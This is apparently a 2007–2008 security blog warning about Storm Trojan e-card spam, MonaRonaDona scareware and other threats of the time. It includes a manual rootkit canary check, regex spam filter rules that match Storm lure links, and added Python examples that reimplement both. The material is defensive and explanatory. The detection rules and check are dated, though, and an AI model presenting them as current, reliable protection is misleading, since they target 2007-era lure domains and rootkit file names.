One of the things that made Storm Trojan links stand out last year was that most of them were numeric IP addresses, rather than domain names, in their links. These links resemble this example: ht*p://123.123.123.123/(some garbage characters may follow). During the last quarter of 2007 the Botnet began using actual registered domain names to reach the target host computers, which are managed on what is known as a Fast-Flux DNS network. Most of these domain names were registered within a few days of the spam run and are usually allowed to die shortly thereafter.

The Storm has become active again and is once again spamming out email messages about e-cards and postcards, most containing the good old numeric IP links. All of the targets are infected PCs and if you are duped into clicking on a link to such a target, exploits await you, including an automatic download of the Trojan. Should this fail, you will be enticed to click on a link, or an image to begin your download, supposedly to view your e-card/postcard. At this point, if you are running a Windows based computer, with Administrator level privileges, your PC is about to become a zombie member of the Storm Botnet.

If you receive one of these e-card/postcard notices delete it immediately. If the sender looks like a name you know, check the email address to see if it matches that name. If in doubt, contact that person to see if they knowingly sent you an e-card, from that particular e-card company. Chances are they won't know anything about it. You see, the names and addresses used in the From fields are all harvested from infected computer contact lists and address books. All spam email messages since late 2006 have totally forged From and Reply to email addresses. The people whose names and addresses are being used have no idea this is happening and cannot stop it. If you have sent an email to somebody whose computer gets infected with an email harvesting trojan or Worm, your email address will not only receive spam, but will be used in forged From and Reply To fields of spam messages. There is nothing you can do about this. Even my accounts have been harvested from computers of customers and friends and I see spam coming to me, supposedly From me!

Unwanted E-Card/Postcard = DELETE! Leave the curious George stuff to professionals like me and the anti-exploitation labs.


March 4, 2008

Watch out for a new fraudulent anti-virus ploy named MonaDonaRona

Most experienced Windows PC owners know by now that their computers are the primary targets of every type of malware exploit that can be conceived by man or machine. Prudent PC owners take extra precautions and ensure that their computers are protected and scanned regularly, with up-to-date anti virus and anti spyware programs. They also tend to use more secure browser settings, or switch to Firefox for their Internet browsing, instead of Internet Explorer. Yet, millions of PCs are infected every day, with all manner of spyware and viruses, with many of them belonging to fairly new computer users (Newbies). Why is this?

A lot of the reason for the constant increase in infected computers is due to inexperienced, or unaware Windows PC owners operating without proper and active security protection onboard. I have disinfected lots of computers that had either no virus protection at all, or had expired anti virus applications on them. An expired product is as useless as if it wasn't there, and gives a false sense of security to untrained PC users. Most of these products ship with new computers and offer a free 3 or 6 month trial period, after which they become inert, unless a subscription is paid for to keep them updated with new threat definitions.

This background information leads into the subject about which I am posting today. It has to do with a brand new malware threat that is in the Wild, calling itself: "MonaDonaRona." This is a malware "Trojan" that is acquired by downloading and installing a fake software program called RegistryCleaner 2008, although there may also be other means of delivering the infection. Once MonaDonaRona is installed on the victim's PC it pops up an ominous alert, identifying itself by name, and proudly proclaiming its intention to cause harm to your computer, currently using this text:

"Welcome to MonaRonaDona. I am a Virus & I am here to wreck your PC. If you observe strange behavior with your PC, like program Windows disappearing, etc., it's me who's doing this."

This pop-up alert and strong language is meant to panic unsuspecting victims into paying to have it removed by a fraudulent anti virus program, which is a companion to this threat. People who are duped by this two-handed ploy will have the MonaRonaDona alerts turned off by the companion malware application, which they had to pay for to use. This is also known as extortion-ware. The MonaRonaDona component is only there as bait for the fake anti virus program, which the perpetrators of this fraud want to sell, for about $40 US. The fake anti virus product may be called "Unigray," or other names. It is apparently not linked to directly at this point in time, but the victim is expected to search for anti virus programs that specifically target it.

False information about the fake anti virus program has already been spammed to Google and other search engines, through phoney blogs and spam blog postings, poisoning the results pages. If the victim searches for help removing MonaRonaDona, they will most likely see the fake products listed at the top of the results. This is a new method of delivering fraud-ware, by gaming search results and panicking users into searching for the spammed, fake removal tool.

The fake removal program will tell MonaRonaDona to shut itself down, making the victim believe that the anti virus program actually removed it legitimately. But, this is merely a ploy. Most free anti virus and anti spyware programs will detect and remove this threat within a few hours of its discovery, if you check for updates every day, several times a day.

Early credit for this discovery goes to Eugene Kaspersky and his famous, commercial Kaspersky Anti Virus products. They are often first to intercept malware that comes from certain regions of Russia where much of the World's malware is written and launched.

If you don't have any up-to-date anti virus protection on your Windows PC, give TrendMicro a try. If you can't afford to buy commercial anti virus protection there are various free programs available. I would unhesitatingly recommend AVG Free, although Avast! is also very good.


February 23, 2008

Current Malware Threats In The Wild

Malware

Computer programs coded - or modified - to endanger your computer, or compromise its security, or make it part of a Botnet, or display unwanted advertising pop-ups, or defraud you, or steal your log-in user names and passwords, or your identity.

Malware includes computer viruses, Trojans, backdoors, rootkits, spyware, adware, keyloggers, dialers and rogue (fake) anti-spyware and anti-virus programs.

All of the above mentioned malware types are threats to anybody running a Windows based operating system, especially when they are connected to the Internet. There are malware threats that are specifically targeted at other operating systems, like MacIntosh and Linux, but they are less prevalent, mostly due to the smaller installed base of those OS's. Some come to you over the wires, so to speak, via TCP/IP attacks against open "ports." A router between you and your external broadband modem can stop those attack vectors (unless you have poked holes in the router's firewall). However, no common router has the means of protecting you against malware threats that come in as you read email, or use your Internet browser. Unless you have an advanced router that receives regular updates to its malware detections, you will need to keep a software firewall running on your computer, to protect it against hostile incoming TCP threats.

Malware threats do not just come from the Internet. I got into computer troubleshooting before I was connected to the Internet, due to an infected floppy disk. Floppies are mostly gone nowadays, but there are still some CD's, DVD's and plug-in memory devices that are somehow infected before going to, or during production. Then, you have certain music companies who knowingly install programs onto their CD's, which install rootkits onto the computers of legitimate buyers, to prevent copying those CD's (DRM protection). This was done a couple of years ago by Sony-BMG. Those DRM rootkits were then exploited by cyber-criminals to install other, much more dangerous types of malware.

Every week or two there seems to be a new type of malware attack method discovered, as well as constant variations of existing methods of infection. This article will review the latest methods of delivering viruses, spyware, rootkits, backdoors, keyloggers and Trojans to your PC. All of the threats listed are already "in the wild." Most of them are being used to draft unprotected, or insufficiently secured Windows PC's into Botnets. Others are used to steal login information to website control panels, servers, banks, eBay, PayPal, or similar institutions. Then there are the pop-up ad windows that can render a computer unusable, and rogue anti-spyware programs that trick you into paying to remove the threats that the program itself invented, or installed. Your best defense against all of these threats is to keep a firewall running at all times, keep the most current version of anti-virus and anti-spyware programs working and updated, and keep fully current with Windows or MacIntosh security patches and updates (yes, Apple releases security patches too).

The most prevalent malware threats, in the Wild, include the following (The Dirty Dozen):


  • Lunar eclipse video scam - link leads to Trojan and Botnetting if clicked

  • IRS rebates and refunds phishing scams - targets US citizens by mail or phone

  • Bank Of America phishing scam

  • Hillary Clinton video download scam - link downloads a Trojan if clicked

  • Britney Spears and Paris Hilton video scams - link downloads a Trojan if clicked

  • Storm Trojan numeric links in spam emails continue, but are reduced.

  • Thousands of compromised web servers are still allowing JavaScript redirection exploits to occur, leading to stealth download infection attacks to many visitors of the web sites hosted on those servers.

  • Compromised individual web sites have had hidden iframes installed, by criminal hackers, leading to instant infection of insufficiently secured PC's visiting those web sites.

  • Adobe Reader had a vulnerability that, if exploited, allowed complete computer takeover. Everybody using Adobe Reader or Acrobat should be sure they update to the latest, patched version. Use the program's Help menu to check for updates and install them.

  • Apple QuickTime exploits are in the wild. Make sure you update to the current version.

  • There are Java virtual machine exploits on compromised web pages. Make sure your computer has the latest version of Sun's Java.

  • Finally, rounding out the Dirty Dozen, certain brands of wired and wireless routers are being targeted with DNS redirect attacks. This involves sending code, from simply opening a hostile spam email message, to the targeted router, which reprograms the router to send users to a phishing banking website, or other financial institution, if you try to logon to that institution. Router exploits that are in the wild were recently successful against millions of Mexican DSL routers, many of whose owners used the bank that the redirect was aimed at. All of these router attacks depended on the users not setting a personal Administrator password! Those with a password were not affected.


What you can do to protect your PC and your identity

If you have a Mac OS PC, make sure you check for updates at least once a month, or turn on automatic checking for security updates. Mac's "Finder" has a link to check for Apple Updates. If you have iTunes installed, it may need updates occasionally as well.

If you have a Windows PC, the quickest method you can use to check the security level is to visit the security website, Secunia.com, and run their online Secunia Software Inspector (requires Java). After you read the instructions and click on Start, a second page will load, then click on Start on that page and it will scan your PC for vulnerable software in its database, and missing Windows Updates. If the Software Inspector finds outdated versions of software it will highlight them with a red mark and expand their details to tell you what vulnerability exists. It will also provide a direct link to the applicable page where you can download the patched version. Sometimes, Secunia will locate an older version of Flash, or Java, that has been left behind after updating to the current version. It will show the locations of those still-vulnerable files, which you should manually delete, or uninstall (Control Panel > Add/Remove Programs).

To protect your router from code exploits, establish a unique Administrator password (do not use the word "password"), disable remote administration and turn off UPnP. If you have a wireless router, set up the best level of encryption your receiving computers can work with. Most broadband routers come with a firewall, with configurable rules and a means of "poking holes" in them. Make sure your router's firewall is turned on and do not allow any port holes unless they are necessary for your personal or business use (e.g: filesharing, VPN, remote desktop, ftp, etc). Routers use "NAT" to hide your personal network computers from the public Internet. This makes them a less visible target for TCP/IP exploits.

Finally, if your PC shipped with a free trial version of a security program and it has expired, and you have not paid to renew it, you had better either pay for it, pay to upgrade it, or uninstall it and get a different security program. An expired anti-virus or anti-spyware program is totally useless and its only current effect is to eat up valuable system resources! There are many fine security programs available, both in retail stores and online. I have ads for several brands on this blog and on my other web pages, all of them reputable. However, I have my eye on one in particular that seems to be pulling ahead of the others, especially in the area of intercepting web site borne malware threats. That company is Trend Micro. They have a technology that is included in the Trend Micro Internet Security 2008, also known as "PC-cillin," that analyzes the content of web pages you visit, screening them for either known hostile codes, or potentially hostile embedded exploits, based on heuristics. If such codes are discovered Trend Micro's web threat protection will block the harmful content, while allowing safe content to be delivered. Or, it can block the entire web site from downloading anything, if you prefer. This type of defense is invaluable when you consider that much of today's malware is being delivered through website exploits and hidden redirects.

The Trend Micro Security Suite 2008 also comes with a two way firewall, anti-virus, anti-spyware and anti-phishing protection, with multiple daily automatic updates, all for a reasonable subscription price and allowing you to protect up to three PC's under one license. Get 10% Off a 1 year subscription to Trend Micro Internet Security 2008, using Coupon Code: TrendIS08.


December 28, 2007

Is your computer infected with the Storm Trojan?

First, some background information about the Storm Trojan.

Since July 1, 2007, I have written several blog articles warning people to be on the lookout for email scams that contain links that cause Windows computers to become infected with the Storm Trojan. This malware threat has already infected more PCs than any other in the history of personal computing. In August of 2007 estimates put the total number of infected computers at anywhere from 1 million to over 5 million! All of the infected computers acquired the Storm Trojan through social engineering trickery of their human owners.

Early varieties of the Storm Trojan, which began circulating widely in January, 2007, used catchy news headlines (some true, some false), such as news of hundreds of people killed by storms raging across Europe. Early payloads were carried in hostile attachments, offering more information or the full story, but were rigged with the Storm Trojan malware. Later, in mid-2007, the authors began shifting away from using attachments and started providing links to the already infected computers, which were now used to host web pages that carried exploit codes and copies of the Trojan itself. The owners of these computers had no idea that their machines were being used for this purpose, and other purposes even more sinister.

It was in June 2007 that I began to notice suspicious numeric links in email spam messages, that characterized the new breed of the Storm Trojan. There were several phases where different techniques were employed, all designed to appeal to human curiosity and which snared more and more unsuspecting victims into the ever-growing Storm Botnet. There were e-cards, postcards, verification messages, free music, free games, funny cats, dancing skeletons, Naughty Christmas cards and now, New Years greetings postcards. All of these scams contain a link which the person reading the email must click on. If you are running a Windows computer that has not been fully patched against all known vulnerabilities in the wild, and you clicked on one of those links, chances are good that your computer has become a "zombie" member of the Storm Botnet.

Most of the time, the owners of these compromised machines don't know what is happening behind the scenes, as all of this activity is hidden from the user interface. The only give-away that something is amiss would be occasional unexplainable computer and Internet slowdowns, along with periods of high activity on their (external or broadband) modem "activity" lights, as thousands of spam emails, or DDoS attacks are launched from their computer. So, aside from flickering modem lights, how can you tell if your Windows computer has been infected with the Storm Trojan?

Since the Storm Trojan has been around for about a year now, it is safe to say that all anti virus and anti spyware programs have definitions to detect and eliminate this threat. If you have an anti virus and/or spyware program, make sure your scanning engine is fully current, and the definitions are up to date, then reboot into Safe Mode and scan all files. Safe Mode scanning is recommended, because, although the Storm Trojan installs its "service" as a hidden "rootkit," it still has supporting processes and files that can be stopped and deleted from Safe Mode. After the support files and registry entries are terminated the rootkit infector will be vulnerable. With any luck your security program will find and remove the files and services associated with this Trojan.

If you don't have an anti virus or anti spyware program on your Windows computer you are probably already infected with all manner of malware. There is a manual method that you can use to determine if your computer has/might have the Storm Trojan. A rootkit keeps its own main operational files from being viewed in Windows Explorer, or in Command Windows, by intercepting attempts to find those file names, or slight variations of their names and sending a null result to the screen. These are known as "super hidden" files. So, if your computer does have a rootkit infector and you were to look for their presence using a Windows Search, or a "Dir" command in a DOS Command window, the rootkit file(s) would not reveal themselves to you. Interestingly, if you were to create a new text file on your Windows desktop, with the same prefix as the rootkit's files, that file would instantly disappear from view, or would not appear in a DOS Window directory listing.

While the Windows desktop file may or may not work as described, a Command Window can be used to reveal the presence of the Storm Trojan's rootkit.

Since Windows Explorer refuses to display super hidden rootkit files and services, a good old DOS window and some special commands might do the trick, by hiding a specially named file that you just created. Here's what you need to do to check for the presence of the Storm Trojan rootkit component.


  1. Go to Start > Run and type in: CMD and press Enter

  2. A "Command" Window will open, with a blinking cursor, waiting for text input from you.

  3. Case doesn't matter with these commands.

  4. In the Command Window type this: copy con spooldr.txt

  5. Press Enter. The blinking cursor should move down to a blank line.

  6. Type a few words to create some filesize, then press F6. You should see a ^Z, after the last character that you typed.

  7. Now, press Enter. You should see "1 file(s) copied" and the cursor will blink again on a new command line.

  8. At the blinking cursor, type: DIR spooldr.txt and press Enter.

  9. If you see a report showing 1 file(s) and a filesize in bytes and the file name, you have passed the first test.

  10. Repeat rules 4-8, substituting these filenames each time: noskrnl.txt, wincom.txt, clean.txt, bldy.txt

  11. If all of these files are listed in the DIR results, you're probably ok (the file names are now being changed frequently), but, if the DIR command shows 0 files found for any of these files, you are infected with the Storm Trojan and its rootkit.

  12. If all of these files show in a DIR listing, you should delete them by typing: DEL filename.txt (substituting the actual filenames) and press Enter and the named file will be deleted.
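The twelve steps above, automated, as an added example that is not part of the original post: a Python script (my own, not a tool from the post) creates a canary file for each of the names listed, checks that it is reported both by a directory listing and by a direct attribute lookup, then deletes it again. The file names come from the post, which warns that they change frequently; the directory and name list are parameters, and it assumes the rootkit hides names from enumeration rather than blocking file creation.

```python
"""Canary-file check for a listing-hiding rootkit (added example, not the post's code).

Mirrors the manual copy con / DIR / DEL procedure: create a file with each
suspect name, confirm it is visible, then delete it.  A name that fails to
show up is the symptom the post describes.  On a clean system every name is
visible, so hidden_canaries() returns an empty list.
"""
import os
import tempfile
from typing import Dict, Iterable, List, Optional

# File names taken from the post; the post warns that they change frequently.
STORM_CANARY_NAMES = ["spooldr.txt", "noskrnl.txt", "wincom.txt", "clean.txt", "bldy.txt"]


def canary_visibility(names: Iterable[str], directory: str) -> Dict[str, bool]:
    """Create each canary in `directory`, record whether it is visible, remove it.

    Visible means the name appears in os.listdir() AND os.stat() succeeds with
    a non-zero size.  On Windows those map to FindFirstFile and
    GetFileAttributesEx, the enumeration calls a user-mode rootkit typically
    hooks, which is why both views are checked (assumption: the rootkit hides
    names rather than refusing to create the file).
    """
    results: Dict[str, bool] = {}
    for name in names:
        path = os.path.join(directory, name)
        try:
            # "x" refuses to overwrite a real file that happens to have this name.
            with open(path, "x", encoding="ascii") as fh:
                fh.write("canary file, safe to delete\n")  # some size, as in step 6
        except FileExistsError:
            # Something already has this name.  If DIR shows it, it is an
            # ordinary file and we leave it alone; if it exists yet is not
            # listed, that is exactly the hidden-file symptom.
            results[name] = name in os.listdir(directory)
            continue
        try:
            listed = name in os.listdir(directory)          # the DIR view (step 8)
            try:
                stat_ok = os.stat(path).st_size > 0         # the direct-lookup view
            except OSError:
                stat_ok = False
            results[name] = listed and stat_ok
        finally:
            try:
                os.remove(path)                             # step 12: DEL the canary
            except OSError:
                pass  # a hidden canary may refuse deletion; report, do not loop
    return results


def hidden_canaries(names: Iterable[str], directory: str) -> List[str]:
    """Names that vanished from view: the post's 'infected' signal."""
    return sorted(n for n, visible in canary_visibility(names, directory).items() if not visible)


def run_check(directory: Optional[str] = None) -> List[str]:
    """Run the Storm name list in `directory` (a fresh temp dir when None)."""
    if directory is not None:
        return hidden_canaries(STORM_CANARY_NAMES, directory)
    directory = tempfile.mkdtemp(prefix="canary_")
    try:
        return hidden_canaries(STORM_CANARY_NAMES, directory)
    finally:
        try:
            os.rmdir(directory)
        except OSError:
            pass  # a stuck canary keeps the dir; leave it for manual inspection


if __name__ == "__main__":
    missing = run_check()
    if missing:
        print("WARNING: canary files hidden from view:", ", ".join(missing))
    else:
        print("All canary files visible; this check found no listing-hiding rootkit.")
```

A clean result only rules out the specific hiding behaviour the post describes; it is a quick triage, not a substitute for the scanners recommended below.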


I advise you to leave disinfection of rootkit threats to professional grade security applications, like Norton, McAfee, Kaspersky, or TrendMicro Anti Virus programs, or Webroot Spy Sweeper, or PCTools Spyware Doctor. There are links to some of these programs on this blog. Some of them offer a free trial download, and others offer a free online scan. If you can't afford one of these commercial programs you can download (install and update!) AVG Free Anti-Virus, or SpyBot Search and Destroy, which is also free, from the links in the right sidebar >>>

If I come up with some effective manual removal instructions, that can be used by the average computer owner, I will post them in a follow-up blog article.


December 26, 2007

Beware of "New Year" email "Postcard" threats

This is a heads up to you all to beware of a new round of Storm Trojan email threats, now making the rounds. They contain a New Year subject and one line of body text and a link on the second line that contains the word postcard, or a variation thereof. Do not click on this link. Delete the message. The destination is a Storm Worm Trojan infected computer, running an Nginx small web server, with but one page. The page contains code to instantly redirect you to an automatic download location, where you will receive your very own copy of the Storm Trojan. If you visit the first page with JavaScript disabled, you will be presented with an enticement to manually install the Trojan; to view your "postcard." Not! The three spammed email messages I analyzed this morning all contained variations of the following two lines of deactivated text:

As the new year...
h**p://uhavepostcard.***/

That URL was spammed out on Christmas day, three days ago. The current Storm Trojan spam messages now have links to happycards2008.com, or newyearcards2008.com, or familypostcards2008.com, which are different URLs than in the attacks that began on Christmas Day and more changes are expected over this weekend.

The emails I have analyzed so far today led to infected computers, with web pages containing a clickable link to a locally hosted file named "happy-2008.exe," or "happynewyear.exe," which is the Storm Trojan itself. The infected host computers are zombie members of the Storm Botnet and are all over the World. The redirects in them lead to exploited servers, similarly all over the World. These servers have been compromised over the year in anticipation of serving up payloads on demand. They are zombie servers in that no unusual activity would be noticed from them until people start arriving from redirects on infected PCs. Unless people report these infected servers they will remain online long enough to do a lot of damage. One way to report them is to become a reporting member of SpamCop.

If, like me, you use an anti spam front end for your email client, such as MailWasher Pro, and it allows you to create regular expression spam filters, try adding these rules to detect the Storm Postcard threats:

UPDATED 12/30/2007 to add new target domain names and shorter RegExpr.
The subject contains any of these words: "(e-) card, or greeting, or postcard, or New Year, or New 2008 Year"
AND, The body contains any of the same words; AND
The body contains a hyperlink containing this regular expression:

http://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/|(.+postcards?|newyearwithlove|.+cards2008)\.com)

Here is that entire updated rule, in MailWasher Pro format, for use in the MailWasher filters.txt file (This code should be on one long line):

[enabled],"Postcard Trojan Scam","Postcard Scam",16711680,AND,Delete,Automatic,Subject,containsRE,"\b(e-?)?(card|greeting|postcard|new\ year|Happy\ 2008!|New\ Hope\ and\ New\ Beginnings|new\s.*year)",Body,containsRE,"\b((e-?)?(post|greeting\s)?card)|new\ year\b",Body,containsRE,"\bhttp://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/|(.+postcards?|newyearwithlove|.+cards2008)\.com)"
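To see the ANDed rule above in action outside of MailWasher, here is an added Python example (not part of the original post and not MailWasher's own code) that applies the same three regular expressions to a few constructed sample messages. It assumes case-insensitive matching, which the mixed-case alternatives in the subject pattern imply.

```python
import re
from dataclasses import dataclass

# The three patterns are copied from the MailWasher Pro rule quoted in the post.
# MailWasher's exact matching semantics are not documented here; this example
# assumes case-insensitive matching (an assumption, see the lead-in).
FLAGS = re.IGNORECASE

SUBJECT_RE = re.compile(
    r"\b(e-?)?(card|greeting|postcard|new\ year|Happy\ 2008!"
    r"|New\ Hope\ and\ New\ Beginnings|new\s.*year)", FLAGS)
# Note: "\bcard" has no trailing \b, so words such as "cardiac" also match;
# the third condition (the link pattern) is what keeps false positives down.
BODY_WORDS_RE = re.compile(
    r"\b((e-?)?(post|greeting\s)?card)|new\ year\b", FLAGS)
BODY_LINK_RE = re.compile(
    r"\bhttp://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/"
    r"|(.+postcards?|newyearwithlove|.+cards2008)\.com)", FLAGS)


@dataclass
class Message:
    subject: str
    body: str


def matches_postcard_rule(msg: Message) -> bool:
    """True only when all three conditions hold; the rule is an AND rule."""
    return (SUBJECT_RE.search(msg.subject) is not None
            and BODY_WORDS_RE.search(msg.body) is not None
            and BODY_LINK_RE.search(msg.body) is not None)


def classify(messages):
    """Map each subject to the rule's verdict, mirroring its Delete action."""
    return {m.subject: ("Delete" if matches_postcard_rule(m) else "Keep")
            for m in messages}


# Constructed sample messages (not real captures). The links follow the shapes
# the post describes: a bare numeric IP, and *postcard / *cards2008 domains.
SAMPLES = [
    Message("You've received a postcard from a family member!",
            "Your postcard is waiting.\nhttp://192.0.2.10/?abc123"),
    Message("Happy New Year!",
            "As the new year...\nhttp://happycards2008.com/"),
    Message("New Year greeting card",
            "See your card at http://uhavepostcard.com/"),
    # Legitimate mail mentions a card but links to an ordinary domain: kept.
    Message("Re: birthday card for grandma",
            "I ordered the card from http://www.example.com/cards"),
    # Subject and body words match but there is no link at all: kept.
    Message("Happy New Year from the team",
            "Wishing you a happy new year. No link here."),
]

if __name__ == "__main__":
    for subject, verdict in classify(SAMPLES).items():
        print(f"{verdict:6s} {subject}")
```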

I am posting updates as I detect changes to the target domain name or subject/body text. Remember, the authors of the Storm Trojan are constantly altering the text and payload URLs, to fool spam filters and people. If you are not screening your incoming POP email you leave your computer at risk, should one of these threats fool you into clicking on a link to an infected computer, or server. I have a full page describing the email screening program - MailWasher Pro, with links where you can download it for a free trial. It is very inexpensive to license, for the life of the product. You don't have to pay for version updates like you do with most security programs these days. The only recurring charge associated with MailWasher Pro is voluntary membership in their managed spam reporting group, called FirstAlert.

MailWasher Pro is free to try for 30 days, and still costs only $37.00 to register, which includes a one year, renewable subscription to the FirstAlert! spam reporting system, plus, FREE Mailwasher program updates for life.


September 13, 2007

Storm Trojan now using real domain links in NFL Tracker scams

The so-called Storm (Worm) Trojan has been continuously changing the subject and body text used to trick victims into clicking on links which cause their computers to become part of the "Storm" Botnet. Previously, all Storm scam messages came in with numeric links to compromised Windows computers, on broadband connections, which were a clear giveaway to even the most casual recipient that something was not right. Then, at the beginning of September I began to see Storm scams that had the numeric IP destinations wrapped inside a fake domain name. The true, numeric destination was revealed by mousing over the link, so it was still relatively easy to detect that the message was most likely a scam.

It is extremely unusual for hyperlinks to be numeric, but not totally unseen. Most websites use a "friendly name" for the domain, like example.com. On very rare occasions a website may not use a friendly name, usually when it is in transit from one server to another and DNS changes need time to propagate throughout the name server system. In the case of the web pages hosted on Storm Trojan infected computers the URLs had to be numeric, because the zombie computers did not have registered domain names. Instead, they have a small web server, called Nginx, installed by the Storm Trojan, and are almost always connected to broadband cable or DSL Internet services with infrequently changing IP addresses. Since the IP addresses of these zombie computers do occasionally change, due to rebooting the modem or forced IP renewals by their ISP, the authors of the Storm Trojan had to come up with a new way to keep them reachable through changes in IP addresses, and they have done just that.

In a new twist to the previous numeric IP scam, the authors of the new scam are using free DNS services to point their parked domain names to always-on cable Internet computers that are part of the BotNet. Thus, if the intended victim mouses over the link it still displays the friendly domain name (e.g. example.com). If they are fooled by the scam pitch into clicking on that link, they will arrive at what looks like a standard, large web page all about the subject of the scam message. There will be lots of links on that page, just like you would find on a real web page. But, in this instance, what you don't know can and will hurt you!

See my extended comments for a more technical description about this new NFL Tracker threat.

Your best defense against the Storm (Worm) Trojan, in all of its incarnations, is to use common sense and not click on links in unexpected emails, featuring dubious text sales pitches. If you use anti-spam software you should train it to recognize what you recognize as spam, or scams.

I use MailWasher Pro to screen all of my incoming email. It uses a variety of methods to identify and deal with known, or suspected spam email, including custom filter rules that define the kinds of spam that are most common. I happen to write and publish three sets of custom filters for MailWasher. They are in direct response to the daily variations in email spam and scam threats that I see as I check my numerous accounts on 12 minute intervals. While my filters admittedly slow down the processing of your incoming messages, they provide a defined warning in the Status field, indicating what types of spam filters have been matched. The first two sets of filters only flag spam that is matched by my rules, leaving you to decide if they are truly spam, or legitimate - false positives.

filters.txt is the largest set with rules going back several years, including the most current rules.

filters2.txt is a reduced set of the most current filters; I use a more potent version of it myself.

filters3.txt is what I call my Judge Dredd rules, because they, like my personal filters, are set to automatically hide and/or delete anything that is identified as spam. I describe them as my "Murder-Death-Kill rules," as borrowed from the movie "Judge Dredd." In the rare instances where a legitimate email is automatically deleted by a filter, I can review and restore that message from the MailWasher Pro Recycle Bin.

To recap, the authors of the Storm Trojan are constantly changing the subject and body text, in an effort to deceive more and more people and to accumulate the largest BotNet in the history of distributed computing. As of this week, it is estimated that the Storm BotNet has more computer and CPU power than the World's top 5 supercomputers put together. The damage that this BotNet has done, is doing and may yet do is beyond anything previously seen on the Internet. If all of these machines are used in DDoS attacks there is very little that would be able to stand up to them. That includes websites, governments, even entire countries (the country of Estonia was effectively taken offline by a huge DDoS attack earlier this year).

I strongly urge every reader of my blog to install the best anti virus and anti spyware software that you can afford, keep it completely updated and scan for threats every night.

Continue reading "Storm Trojan now using real domain links in NFL Tracker scams" »


September 9, 2007

New Storm Trojan tactic uses football game tracker as bait

The authors and promulgators of the Storm Trojan are very devious and criminally clever people. Every month they seem to completely change the nature of the scams used in the spam emails sent from already infected computers. Each new scam uses a different type of social engineering to deceive spam recipients into clicking on the (numeric) link embedded in those messages. Usually the links are shown as numeric, but lately some are concealing the destination until you hold the mouse over the link, at which time you will see a numeric URL. An example of a numeric URL would be: http://127.0.0.1/. The same link wrapped inside a friendly-name cover might resemble a link whose visible text reads "devious words," but which leads to the same numeric destination when you mouse over it. The destinations in my examples go to your own computer, at 127.0.0.1 (local machine), for safety's sake.

Earlier this summer the trick most widely used was the postcard scam. Now they are kicking it up a notch and appealing to sports fans' curiosity to fool them into infecting themselves. With the US professional football season kicking off this month (pun intended), the criminal minds authoring the Storm Trojan email scams have unleashed a series of new messages all aimed at enticing football fans into downloading a so-called "game tracker." As with all of the previous Storm Trojan payloads, this one resides inside infected computers onto which a web server has been installed. If you click on the link in the scam email you will see a real web page containing all kinds of descriptions and links to features and information. There is even an image map that is one huge link. Every single one of the links on these pages goes to one and only one place: "tracker.exe." Click on that and what you thought was a game tracker program will in reality turn your computer into another zombie member of the Storm Trojan BotNet.

Another trick being employed by the Storm Trojan is a link supposedly to a program that prevents the RIAA from tracking files shared illegally over peer to peer networks. Again, this is the Storm Trojan at the other end of those links.

If you use MailWasher Pro to screen your incoming email and are not already using my custom spam filters, what are you waiting for? They are free for you to use! They are my gift to the World. I hate spam and want to help others detect and delete it, before threats like the Storm Trojan can fool them into becoming unwitting victims. You can even discuss my filters in my own topic labeled: Wizcrafts Custom MailWasher Pro Filters discussed here, on the Firetrust.com forums.

Please use caution with any links arriving in email messages from senders you don't know, or even those you do know. Do not click blindly on links in emails, especially if they are numeric! Those IP addresses are infected home or office computers, on DSL or Cable Internet services.

Continue reading "New Storm Trojan tactic uses football game tracker as bait" »


August 23, 2007

Email Threat - Trojan-Downloader "Storm Worm" - Its History, Payload and Variants

This is a follow-up to an article I wrote about the Storm Worm, in my blog a couple of days ago. That entry was meant to warn you about the new variations in the subjects and body text, designed to trick you into getting your computer infected. This article presents a brief history and analysis of the methods used to infect computers, as well as a description of the actual payload, of the so-called "Storm Worm" Trojan downloader.

History of the Storm Worm Trojan

Distributed through massive blasts of spam emails, the threat now known as the "Storm Worm" Trojan-Downloader was first noticed in the wild in November, 2006 and has gone through many external alterations since then, although the payload has remained basically the same. Various anti virus companies have labeled the variants with such names as: Win32/Nuwar, Trojan.Peacomm, Trojan-Downloader.Win32.Small.DAM, Trojan.Downloader-647, Trojan.DL.Tibs.Gen!Pac13, Win32.Zhelatin, and of course: "Storm Worm."

The Trojan now called the "Storm Worm" got its name after a huge spam run on Friday, January 19, 2007, which used the subject line "230 dead as storm batters Europe," to trick people into clicking on links to supposedly read news articles and emergency bulletins about the terrible storms that ravaged Europe during that week. By the following Monday the Storm Worm accounted for 8% of all spam, on a global basis. It received even more notoriety when it was used by infected zombie computers, all members of a BotNet using the eDonkey/Overnet P2P protocol, to launch DDoS attacks against several well known anti spam websites, from January through June, 2007. In fact, some of those attacks are still ongoing against Spamhaus and CastleCops.

How the Storm Worm is able to carry out such large scale attacks is directly related to its success in getting a huge installed base of zombie computers, with different security sources giving varying numbers of infected machines ranging from 2 to 20 million. Either number is too many. There are enough members of the Storm Worm Botnets to bring down an entire country! This has been done entirely by using social engineering tricks to deceive people into clicking on links in spam emails, which lead the victim to other infected computers, where they become infected and join the largest peer-to-peer Botnet ever assembled in the history of Botnets. Each new member of this network receives copies of the Storm Worm Trojan Downloader, a copy of the Nginx web server, an email address collection program, a spam sending program (SMTP server), a DDoS tool, and connection scripts related to the P2P node in which it has been enlisted. All of these machines are remote controlled by criminal masterminds, known as "BotMasters." The owners of this Botnet are suspected of residing in various parts of the former Soviet Union and are the most prolific spammers in the World.

Method of Infection

As I said in the previous paragraph, the Storm Worm spreads by tricking people into clicking on links to a web page hosted on an already infected computer, where they are then infected and zombified into the Botnet. There, they await remote control orders to do the bidding of the BotMaster. So how are these computers infected with the Worm/Trojan itself?

When a person using any version of Windows arrives at the fraudulent web page being hosted on a Storm Worm infected computer there are two things that can occur, depending on whether or not the visitor's browser has JavaScript enabled (most do, by default).


  1. If JavaScript is disabled they will see a plain text message claiming that the website they want is undergoing some tests, or that an additional plug-in or applet is needed to view the content they were enticed with, followed by a text link to click to manually get or see the needed file, or applet. Now, what should I do? It says to click here, but I don't know if I should or not... Oh well, I'll just try it real fast to see what it does and back out if it doesn't look right -> "Click" ... They just infected themselves with the Storm Worm! Idiots!

